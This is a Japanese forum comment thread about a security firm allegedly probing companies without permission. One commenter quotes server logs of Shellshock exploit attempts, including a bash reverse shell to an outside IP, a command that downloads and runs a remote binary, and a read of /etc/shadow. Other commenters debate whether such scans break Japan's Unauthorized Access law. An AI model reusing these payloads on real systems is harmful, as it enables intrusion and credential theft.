パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

とあるセキュリティ企業、上場企業100社に対し無断で攻撃を行っていた?」記事へのコメント

  • by Anonymous Coward on 2014年10月23日 12時40分 (#2698748)

    自分の所のログを出すのは気が引けるので、他所の記事ですが。

    http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]

    >c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
    >202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
    >109.95.210.196 - - [26/Sep/2014:22:20:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 262 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesain/ [singlesain]
    >83.166.234.133 - - [27/Sep/2014:13:57:37 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://agilegroup.co.jp/ [dipad.biz]\""
    >217.72.242.16 - - [28/Sep/2014:22:34:59 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
    >125.206.224.161 - - [29/Sep/2014:10:29:08 +0900] "GET /technote/modsec-crs-shellshock.html HTTP/1.1" 400 226 "-" "() { :;}; /bin/more /etc/shadow"

    こういうのも軒並み「不正アクセス禁止法」に抵触なんですかね?

    うちのようなこじんまりやってるVPSサーバーでも国内のIPからも結構アクセスありましたし。

    情報開示請求でも出して告発した方がいいんでしょうか?

    • by Anonymous Coward

      抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。

      • by Anonymous Coward on 2014年10月23日 13時14分 (#2698782)

        不正アクセス禁止法に未遂罪はないので、脆弱性があって成功していた場合だけですね。

        親コメント
      • by Anonymous Coward

        スキャン成功してるの?
        成功しなければ未遂なので抵触はしないですよ。
        もちろん道徳的に未遂が許されるわけではないですが。

一つのことを行い、またそれをうまくやるプログラムを書け -- Malcolm Douglas McIlroy

処理中...